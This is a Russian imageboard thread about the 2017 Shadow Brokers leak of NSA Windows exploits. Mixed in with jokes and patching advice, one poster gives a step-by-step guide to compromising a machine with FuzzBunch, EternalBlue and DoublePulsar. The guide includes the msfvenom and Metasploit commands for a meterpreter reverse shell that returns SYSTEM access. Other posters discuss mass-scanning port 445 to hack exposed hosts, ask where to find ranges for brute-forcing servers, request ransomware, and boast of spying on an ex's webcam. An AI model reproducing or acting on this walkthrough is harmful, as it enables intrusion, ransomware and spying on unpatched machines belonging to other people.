К тому же майлру - ну как-то я даже не знаю, или ты заранее все к досмотру предъявляешь?
Не сервер с тротилом, а контейнер самоуничтожающийся.
Хотя он не прав, левый хуй может зайти, и науничтожать к хуям всё
Нет, твои глаза.
Посоны, как вывести грепом найденну. Строку + 4 строки вверх?
>кто открыл у себя порт рдп по гайду
Я этого не делал, у меня стоит тупо спермерка. Мне есть чего бояться?
ключ B вроде
Ага, спасибо.
Бля, унылей занятия чем эти ваши сети с кулхацкингом не найти.
Ты вош догс не играл что ли?
Это типа симулятор мытья собак?
Проиграл
Симулятор собак со вшами.
Там зеродей хоть один был?
Если на ip моего провайдера, через который я хожу в интернеты открыт 445 порт?
Где блядь сорцы сплоитов? На гитхабе уже скомпилированные файлы.
Сырцы не слиты.
Ахуенно. Ну ладно, буду реверсить ESTEEMAUDIT
CONFIRMED — ETERNALBLUE is a #0day RCE exploit that affects latest & updated Windows 2008 R2 SERVER VIA SMB and NBT!
https://twitter.com/hackerfantastic/status/852902728892375042
Я обезопасил себя?
Кидай свой IP - просканю порты тебе.
192.168.0.1.
Внешний же. Если ты за роутером не в режиме DMZ - то опасаться нужно только внутренних угроз+уязвимостей роутера(не врубать работу его вёб-морды в WAN как минимум)
Уязвима не только RDP, но и самба. И вообще - обновиться не проще?
проиграл в голос с опа долбаеба который даже не удосужился описание почитать
рдп эксплоит работает только для икспи и 2003 это старое говно и так ебут все кому не лень.
рдп эксплоит работает только для икспи и 2003 это старое говно и так ебут все кому не лень.
Самба уязвимость на всех виндах, акромя десятки(хотя некоторые источники пишут, что и 10 уязвима)
Иди нахуй шиндоусебан.
ПОРА ПЕРЕУСТАНАВЛИВАТЬ ШИНДОУС, ТАААК ЧТО ТУТ У НАС ОБНОВЫ НАКАТИТЬ АХАХХАХ НАКАНЕЦТА.
Уже 4 года не ставил не одной обновы на свою 7.
и много ты самбы жопой в инет видел лалка?
Большая часть спрятана за натом и порт специально пробрасывать никто не будет
Те немногие с дайрект айпи скорее всего заблокируются фаерволом. Алсо уже все топ антивирусы детектят это говно.
В общем оп треда обычный студент который вдруг ощутил ПРИЧАСТНОСТЬ к хакирам.
Сажа скрыл.
Падажжи, если я с компа по smb расшарил папку на другое устройство, я уязвим?
если ты дайрект ип имеешьчто сильно врядли. или ты специально форвардил порт за нат.
тоже поржал с долбаебов.
300 постов дауны трут о том как страшно жить при этом никто даже описание не прочитал.
Походу оп начинающий провинциальный админ судя по стилю постов.
И?
Там стоит галочка напротив икспи и 2003.
Хуле ты это постишь, я про это и написал. Ты умственно отсталый?
А зачем тебе жопой в инет?
Тебе хватит троянчика, запущенного секретаршей в твоей конторе. PEEZDARIQUE всему.
>Алсо уже все топ антивирусы детектят это говно.
Ты не понимаешь момента - конкретные тулзы - да, детектятся, но важен-то способ. Через неделю появятся новые, еше не детектящиеся.
Кроме того, это захватит огромный парк машин, на которых стоит по каким-то причинам необновляемая система. А таких во внутренних сетях предприятий достаточно.
Какой питон нужон для энтого фрейсворка?
Добра тебе, анон.
>Хуле ты это постишь, я про это и написал. Ты умственно отсталый?
Нет ты.
Посмотри новости, уже все выяснили, что работает и на других версиях.
Кончай нести ахинею.
Секретарша и так запустит любое говно.
И так полно сплоитов типа потато которые отлично работают на необновленных системах.
В чем суть твоего мессаджа не ясно. Но видно что тебе очень хочется казаться умным.
Продолжай расказывать как 2008 сервер овнит сплоит для 2003.
Сажа.
кек.
Ну лан.
А мы то с мужиками и не знаем.
Ты сам то проверял? Или только репостить всякую хуйню можешь?
Кстати зачем ты на github кидаешь, там уже рапакованные и перезалитые.
Стопудов наприклеивали хуйни своей
>Тебе хватит троянчика, запущенного секретаршей в твоей конторе
Причем тут тогда опубликованные сплоиты?
Блять я еблан в скрипте же написано 2.6 ))
просто он вонаби мамкин хакир. Это же круто с умным видом произносить всякие технические термины.
>В чем суть твоего мессаджа не ясно.
Еще раз. В сети уже полно случаев, когда ломали сервера с единственным открытым рдп портом.
Единственная моя цель - предупредить анона, который еще не в курсе ситуации.
>Продолжай расказывать как 2008 сервер овнит сплоит для 2003.
Да мне похрен на тебя. Считаешь себя самым умным - ок, я не против.
Да. Работает. Развернул из бекапа свою ту виртуалку и грохнул ее уже сам. 2008r2, обновления ставил месяц назад, до глобальных патчей.
Больше времени разбираться не было.
Мне без разницы, веришь ты или нет, мое дело предупредить тех, кому это может навредить.
Спрошу тут, может ответят..
Собрался ставить шиндвс10, оно мне Биос не испортит?
Слухи вроде нехорошие ходят Чет я очкую
Собрался ставить шиндвс10, оно мне Биос не испортит?
Слухи вроде нехорошие ходят Чет я очкую
Нахуя это? Обычных пользователей стационарного пека не затронет же.
Спасибо анон, ты очень добрый хакер, боженька тебя за это вознаградит, на небе
А на самом деле ненужно кричать о таких вещах, я щитаю.
Нужно дать рибитишкам вдоволь порезвится
Подразумеваю, что у тебя уже есть скачанные год назад архивы.
Если что - ссылки все есть в статьях, все в открытом доступе, бери да проверяй сам.
Ок, почитай, что с умным видом произносят буржуи, если тебя как-то задевают мои посты.
Притом.
https://www.youtube.com/watch?v=n_MmgtzUUAw
>и много ты самбы жопой в инет видел лалка?
У меня в мухосранске один единственный(номинально есть ещё 1, но на нём 0.01% сидят) провайдер. Он ВСЕМ клиентам предоставляет белый, хоть и динамический(после реконнекта PPPoE) IP. Да, дома у многих стоят wi-fi роутеры, но не у всех же. Просканил сейчас 255 адресов провайдера - 4 самба порта торчит наружу. А сколько всего у провайдера клиентов, как думаешь?
Кто теперь лалка?
>Иди нахуй шиндоусебан
Нет ты.
>Уже 4 года не ставил не одной обновы на свою 7.
Ну ты и балбес.
и? в твоем видео овнят виртуалку смб эксплоитом.
Причем тут РДП?
Я отвечал на пост другого анона, про секретаршу и внутреннюю сеть предприятия или конторы например.
Сервак с файловой шарой, ага?
походу ты совсем в деревне живешь. Даже в пгт у моей бабки поголовно у всех тплинки стоят.
Это те, которые с бекдором в прошивке?
это те с паролем админ
пиздец я с вас в голос ржу. Типа открыли америку интернет в опасности. ЖЖ артемия лебедева уже нашли?
Кстати да, не стоит списывать со счетов уязвимости в древних тплинках+дефолтные или очень простые пароли+возможно включенный wps. Всякие хакиры довольно быстро напишут бота, который всё это автоматом будет чекать и попадая в роутер пробрасывать самба порт наружу.
Бамп вопросу, чет сыкотно за Бивис
Идентификаторы мб какие туда пишутся? м?
Стим не умеет брутить, значить в топку
пропишут в биос смб порт тебе а потом тебе подросят криптолокера.
>пропишут в биос смб порт
Поясните пожалуйста, что делать коммон юзеру, который ни слова не понял из ОП поста. Серверов не имеющий, ничего важного не хранящего.
Пользоваться windows update.
Расслабиться.
И не забывать обновляться и бекапить важные вещи.
нужно в биосе закрыть сб и рдп порт.
Анус себе в биосе закрой, толстота.
А где сажа, тупень?
>скорее беги ставить патчи от Microsoft
Ссылку на патчи. БЫСТРАБЛЯДЬ!!!!!!1101
Мам, я какир)) Ну мааам
Я рядовой юзер винды, чем мне будет угрожать вышеописанная ХУNТА?
Что со мной могут сделать "хакнув"?
шифранут твои файлы
Если хакнут - всё, что угодно. Хоть файлы удалять, хоть вёбкамерой подсматривать как ты письку трёшь. Но более вероятный вариант, что весь твой винт зашифруют и предложат заплатить денег за расшифровку.
ДЛЯ ТЕХ КТО НЕ ПОНЯЛ - ПРОСТО ОБНОВИТЕ СВОЙ ШИНДОУС И НЕ ПАРЬТЕСЬ
Я все понял, порекомендуй каких нибудь криптолокеров годных
bump
Вот как-то так оно выглядит. Ман по установке/настройке накидать?
Давай, тоже потестить хочу. Сперва расскажи, как джве виндовых виртуалки между собой в сеть законнектить для тестов?
Часть 1.
На атакующую виртуалку накатываешь XP/7 x86 (именно x86, не 64). Ставишь питухон 2.6.6 (https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi) и pywin32 (https://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/pywin32-219.win32-py2.6.exe/download), опционально - ConEmu. После установки качай архив с гитхаба (https://github.com/DonnchaC/shadowbrokers-exploits/archive/master.zip), распаковывай папку windows куда-нибудь (c:\nsa\, например)
>На атакующую виртуалку накатываешь XP/7 x86 (именно x86, не 64).
А потом ты её тащишь в сеть и её анально насилуют.
БЛЯЯЯЯ, ну сука. Придётся заняться теперь диким пердолингом. У меня к серваку был рдп настроен свой порт. В роутере был дмз настроен. Ну бля теперь всё перенастраивать придётся. Или может забью ибо всё равно хотел железо менять
Да вот не похуй - пусть насилуют в виртуалке.
Не обязательно тащить её в сеть. Я между двумя виртуалками тестил, брат жив.
Ты долго здесь будешь? Накатываю win7x64 в качестве атакуемой, после еще поставить x86 - минут 30 уйдет на всё это.
Часть 2.
Создаешь в корне диска C: папку logs. Открываешь консоль, переходишь в папку с fb.py (c:\nsa\), запускаешь: python fb.py и смотришь, какую ошибку напишет (а напишет он, что не найдена папка бла-бла-бла). Из текста ошибки дёргаешь название папки, создаёшь её в c:\nsa\. Всё, you are ready to rock.
>Поставь винду и питон
>Запусти скриптик
Взлом уровня /b
Еще с полчаса-час точно буду. Единственный момент - писать буду по памяти, потому что тестовых виртуалок сейчас нет под рукой.
Взлом уровня N S A
Спасибо, а то в твитере одни демонстрэйшон
Часть 3, самое интересное.
Создаешь новый проджект в fuzzbunch. Забиваешь IP'шники (первый - жертва, второй - твой), Use redirection - n (или no, хуй проссышь как оно вообще работает). Запускаешь smbtouch (use smbtouch), оно будет спрашивать всякое, просто соглашайся (в тепличных условиях нормально работает, на "живых" машинах могут возникнуть небольшие затруднения). Ждёшь пока отработает и смотришь, каким сплоитом можно пробить тачку (для 7 32/64 и 2k8 обычно eternalblue).
А если RDP открыт только внутри сети?
Часть 3, продолжение.
Если советует юзать eternalblue - юзай его, если советует eternalromance или eternalchampion - юзай eternalromance (проще в настройке). Прописываешь use eternalblue, опять начнутся вопросы, обрати внимание на тип payload'а (FB/DANE) - нам нужен FB, сервис (SMB, 445) и архитектуру атакуемой системы (smbtouch вроде пишет при сканировании). Заполняешь, спросит про плагины - y, ждёшь. Если будет написано =======WIN=======, то значит на атакуемой машине заработал doublepulsar (NSA'шный бэкдор).
Вангую в вебаче сегодня-же появятся треды по масс-чекингу, аля берем диапазоны отсюда, чекаем массканом 139, 445 и ебошим этерналблюем
Да я уже сам думаю масс-сканилку с гуём накидать, лол
Ставлю вторую (x86). Распиши пока как и в виртуалбоксе в одну сетку загнать?
В обоих виртуалках в настройках адаптера выстави тип подключения - "Внутренняя сеть" и какое-нибудь одинаковое имя. После установки систем назначь IP'шники машинам (10.0.0.1/255.255.255.0 на первой и 10.0.0.2/шлюз 10.0.0.1/255.255.255.0 на второй)
Фаервол установи. Хакиры пососут.
Часть 4.
Так, теперь самое главное. Нужна тачка с metasploit framework. Версия не суть важна, но лучше, конечно, что-нибудь относительно свежее. Для начала соберём DLL, которую будем скармливать DoublePulsar'у. Если атакуемая тачка на x32(x86), то пишем: msfvenom -p windows/meterpreter/reverse_tcp LHOST="IP хоста с metasploit (без кавычек)" LPORT=1338 -f dll > meter32.dll. В рабочей директории появится meter32.dll, перекидываем её в C:\nsa на атакующем хосте. Поднимаем хэндлер, для этого:
1) Запускаем сам MSF - msfconsole
2) После запуска - use multi/handler
3) set payload windows/meterpreter/reverse_tcp
4) set lhost 0.0.0.0
5) set lport 1338
6) exploit -j
После этого хэндлер запустится в фоновом режиме (посмотреть, работает ли он, можно с помощью команды jobs в консоли metasploit)
Метасплоит хер зарегаешь - ещё и кали накатывать виртуалкой или может есть где-то под винду уже спёртый?
ЭКСПОЛОЙТЫ БОЛЕЕ НЕ ПРЕДСТАВЛЯЮТ ОПАСНОСТИ И НЕ ПРЕДСТАВЛЯЛИ ПОСЛЕ 2013 ГОДА, ШКОЛОТА КАК ОБЫЧНО ПУКНУЛА СЕБЕ В ЛИЦО
-Крыса-кун
-Крыса-кун
Я такой капсболд каждые пол года читаю начиная с 2001 года.
Часть 5, почти финал.
В консоли fuzzbunch пишем use doublepulsar, снова начнутся вопросы. Архитектура - такая же, как и на атакуемой машине, дальше спросит про Function - выбираем номер с RunDLL. Спросит про путь до DLL - вводим путь до собранной DLL с meterpreter'ом (c:\nsa\meter32.dll). Прожимаем энтер на всё остальное и ждём. Если всё нормально, то в консоли metasploit появится инфа по отправке стэйджа meterpreter, после чего откроется новая сессия.
Под винду спёртого вроде нет, проще кали накатить.
Аноны, где брать новые диапазоны для брута дедиков?
А, и да, когда будет спрашивать про Ordinal, вместо 1 нужно выставить 5
Меня всегда удивляло это хохло-слово...
Часть 6. NoFun
Прибиваем doublepulsar (use doublepulsar, дальше всё как в 5 части за исключением функции - выбираем Uninstall) и радуемся meterpreter'у с правами NT Authority\SYSTEM. Что делать дальше - уже на своё усмотрение.
На дваче, очевидно же.
Спасибо тебе аноньчик, все развернуто и понятно.
Я так понял отработает doublepulsar и зальет нашу dll'ку затем откроется сессия в метерпретер, собственно обязательно дллку или можно exe заливать?
Я серьезно.
bgp.he.net
DLL онли, Raw Shellcode роняет систему. Если сессия не появится, а doublepulsar будет писать, что бэкдор отработал - попробуй заново запустить doublepulsar (смотри ч.5)
Спасает ли виндозовский фаервол с ограничением доступа по ип к рдп порту?
Ясненько, слава богу что ты есть, на днях еще такой в твитере сижу репостчю этого хакерфантастик, думаю будет настроение над попробовать, а тут и ты подоспел с гайдом.
Сам вряд-ли бы разобрался, вначале думал там в самом fb.py сессия открывается
Если SMB/NBT не заблочены, то нет
А сессия и в fb.py открывается (можешь глянуть - пропиши session после того как eternalblue отработает)
Спасибо.
Вообще, это вин уровня MS08-067, а может даже выше, но я не планирую масс-сканом заниматься (во всяком случае не сейчас)
Алсо, быстрофикс вот сюда. Если же атакуемая ось x64, то после windows добавляется /x64/ (и в msfvenom, и в multi/handler). Т.е. должно получиться так: windows/x64/meterpreter/reverse_tcp
Кстати можно до сих пор находить такие, встречаются под MS08-067 их мало, но есть.
Еще небольшая заметочка может кому тоже пригодится: masscan в 139, 445 не умеет, не знаю почему но конкретно их точно не ищет, их можно искать тупо сканируя 3389, т.к на дедиках они как правило в пачке присутствуют, а затем уже по этому списку пройтись nmap'ом если нужен именно 445.
Взломал комп бывшей. Теперь смогу наконец смотреть её вебкамеру lkdsgnafaba'vbak'ergjaer[gwjeriglkfdvnkjlds vsdf.sd sg, sg sgbsrgtrtbrtbrtbrtrtttttttttttttttttttttttttttttttttttttt
Так можно и своими силами сканить. Обновившихся, на вскидку, процентов 15-20. Можно просто ломать всё (почти всё), что торчит наружу 137/139/445 портом.
8.1 с последними апдейтами ебут?
проф версия
Не тестил 8/8.1. Апдейт MS17-010 вышел 14 марта, если обновлялся недавно, то очевидно что нет.
Да кто блядь включает этот сраный рдп, да еще и порты пробрасывает через роутеры наружу? есть такие ебонутые? слышал только, что дебики так 1С юзают, ну что взять с говноедов.
Поверь, таких дебиков предостаточно, и не только в роиссе. Более того, они еще и автоапдейты вырубают.
>еще и автоапдейты вырубают
Учитывая как это говно работает в винде, ничего удивительного.
>слышал только, что дебики так 1С юзают, ну что взять с говноедов
Щито поделать, когда другие дебики не выделяют денег на сервер виртуализации\1с сурв, а сами гоняют на майбахах
а как выключить рдп?
Не повод по полной забивать на безопасность
Дунно, спроси у гугла
Большинство думает шаблоном "НУ ВЕДЬ У МЕНЯ ФАИРВОЛ И АНТИВИРУС. А ЕЩЁ ПОЛИТИКИ. ХАКИРЫ САСАЙТИ!"
Такс, свои ответы можете задать здесь: зерочан/i/5324, вечером буду.
-кун
-кун
Почему не двощ? Потому что макак-пидор снёс /i/ года 3 назад (если не больше)
Слева - атакующая, справа - жертва.
В обоих вариантах стоит "внутренняя сеть"
ЧЯДНТ?
Обнял, на созвоне :3
Как работает? Ставится в фоне, инсталится при выключении, ещё и спрашивает как хочешь поставить и хочешь ли ты ставить обновления качая с мобильного инета. Если ты не деб который на Семёрке в 2к17 году конечно же.
А, блядь, просто Брэндмауэр шиндоус пинг по дефолту фильтрует. Всё норм.
Он не только пинги фильтрует, как вариант - выруби его
О, ебать. Черношляпники подъехали.
ВСТУПАЙТЕ И КОМПИЛИРУЙТЕ
ВСТУПАЙТЕ И КОМПИЛИРУЙТЕ
Будь няшей, напиши там в треде что-нибудь NULLчан.hk, господи, я хуй знает как еще написать
Помню какой-то хацкер пробрался в мой ровутер через DynDNS, переименовал точку доступа в PWNEDBy2ch и пароль в SmeniParol.
Это я потом понял что у меня DynDNS и пароль стандартный был, но когда я обнаружил ВТОРЖЕНИЕ я знатно очканул.
Работает как говно, апдейты по часу накатывает, будто блядь там вся винда переустанавливается, хранит гигабайты говна после апденйтов.
Я уж грешным делом пошел на анимешный зерочан регаться,
оказывается все куда проще
Спасибо няш
Чо за хуйню поришь? Если на пустую то да, первое обновление долгое, а потом все быстро, пара минут.
Лол, действительно работает. Вечером виртуалочку с кали накачу, для завершения проверки.
Совет - накати ConEmu, не мучайся с консолью
Подозреваю, что ты про голую win7 SP1? Давно уже есть решение(пишу для x64):
1)Голая семерка, вырубаешь СРАЗУ проверку обновлений до втыкания кабеля.
2)Вставляешь кабель, качаешь KB3172605-x64 и KB3020369-x64. Ставишь.
3)Качаешь kb3125574 (это по сути SP2 для семерки), ставишь.
4)Врубаешь обновления и докачиваешь без гемора последние апдейты.
Ссылка по теме:
https://habrahabr.ru/company/eset/blog/301080/
Ну и дрочево
Это один раз сделать и потом спокойно можно оставишь автоматические апдейты. Я столько раз семерку ставил и прекрасно знаю, что если просто win7 сп1 попросить обновиться вин-апдейтом - 2 часа поиска обновлений, 2 часа установки, все апдейты с первого раза скорее всего не встанут -> после ребута снова 2 часа поиска и еще час установка. Так что это "дрочево" самый лучший вариант накатывания семерки.
Что это вообще за йоба? У меня комп сломается?
мимо нихуя не понявший юзер
Сидишь за роутером и обновляешь винду? Тогда нет.
как это всё юзать?
Тред почитай. Тут уже целый гайд написали.
Сижу за роутером, не обновляю (стоит восьмерка). Мне пизда?
под обновление я ведь правильно понял обновление до более новой винды? (Да, я тупой)
> или закрывать порт
> или закрывать порт.
Тред не читал.
Ебанаты, не умеющие менять номера дефолтных портов, а также ограничивать доступ на маршрутизаторе извне, должны страдать.
А разве еще и рдп включен по дефолту? челиков с включенным рдп еще нужно попробовать найти.
Не, обычные обновления для винды, на KB/MS начинаются. Накати вот это - https://www.microsoft.com/en-us/download/details.aspx?id=50027, чтобы быть спокойным
Спасибо, анон
Так вот что это за обновления системы по вечерам не дают пеку вырубить
>менять номера дефолтных портов
Ну это такая себе защита, никакая, службы палятся тем же нмапом по сигнатурам.
А я и не говорил про RDP
Тебе это не нужно, укатывайся из треда
> челиков с включенным рдп еще нужно попробовать найти.
Блядь, как ты себе представляешь сервер с данными, имеющим на сетевой карте реальный белый ip? Я такого даже в цирке не видел.
> Сижу за роутером, не обновляю (стоит восьмерка). Мне пизда?
Роутер не панацея - в них тоже есть уязвимости и места для атак. Но в целом это конечно уменьшает шансы вляпаться.
> под обновление я ведь правильно понял обновление до более новой винды? (Да, я тупой)
Нет, обновления безопасности для твоей версии. По умолчанию в винде включены автоматические обновления. Смотри у себя в системе "обновления windows"
Это как то может коснуться тех, кто сидит на 10ке и юзает вайфай роутер? Что может случится с такими людьми? Расскажите пжлст.
>вайфай роутер
Вайфай головного мозга
Раз вайфай, то беспокоиться не о чем
Я не , но всё же. Представь, на одной из машин в сети появляется малварь (спам, флэха с автораном, еще какая-нибудь дрисня, придумай сам). Подгружается этот же msf, делается pivoting, через поднятый туннель ломается этот злосчастный сервак.
> службы палятся тем же нмапом по сигнатурам
Где? На маршрутизаторе, с прописанным белым списком доступа?
VPS?
Как снять форму высоковольтного (20-30 кВ) низкочастотного (~50 Гц) сигнала, не используя делитель или трансформатор на входе осциллографа? Есть какие-нибудь бесконтактные датчики на такие напряжения?
> Представь, на одной из машин в сети появляется малварь
Представил. Тогда вся эта хакерская хуита из ОП-поста уже не нужна. Сам же знаешь ,что 95% взломов -кроты или тупость пользователей.
Ты изначально вскукарекивал про
>менять номера дефолтных портов
И куда ты там собрался писать свои белые списки на том же vps сервере?
А вот и нет, как раз таки для этого она и нужна (говорю тебе как жуньёр-пенетрастьё). Первичка с минимальными правами > администратор домена за пару кликов.
Тащемта любой уважающий себя провайдер блокирует smb и nbns порты на внешних интерфейсах пользователей.
Такс, пойду я спать, ночь слишком затянулась.
Вечером буду тут: NULLчан.hk/i/5324 (там ноль, да), можете задать свои ответы по поводу fuzzbunch, обновлений, msf и прочего около-каккерского.
-кун
Вечером буду тут: NULLчан.hk/i/5324 (там ноль, да), можете задать свои ответы по поводу fuzzbunch, обновлений, msf и прочего около-каккерского.
-кун
Вангую, что 100% этот тред читает ФСБ.
Конечно, ведь это ужас какой - тут люди собственные виртуалке ХАКАЮТ - ужас какой!
Накатывают обновления виндоуса с американских подводных лодок
@
Блокируют порты ракетами пэтриот малой дальности
У меня 2012 server с доступом по rdp. можно не рыпаться как я понял?
ctrl+f 2012
Не знаю, на какую доску вбросить, кину тут.
14 апреля группа ShadowBroker высыпала в общий доступ кучку эксплойтов для разного.
Не прошло и трех дней, как НАЧАЛОСЬ.
В зоне риска все виндоадмины и просто любители держать дедик с виртуалкой и доступом по рдп.
Если у тебя винда торчит открытым rdp в интернет, особенно если у тебя winserver 2008 - ты попал, так что скорее беги ставить патчи от Microsoft или закрывать порт.
https://github.com/misterch0c/shadowbroker/
У меня лично только что так заовнили пустую виртуалку, с которой я иногда ходил в обход блокировок.
Так-то пофиг, все равно была дотационная, лол. Но знаю, что многие не озадачиваются своевременной защитой.
Обратите внимание, возможно ваш сервер или виртуалку уже шифруют.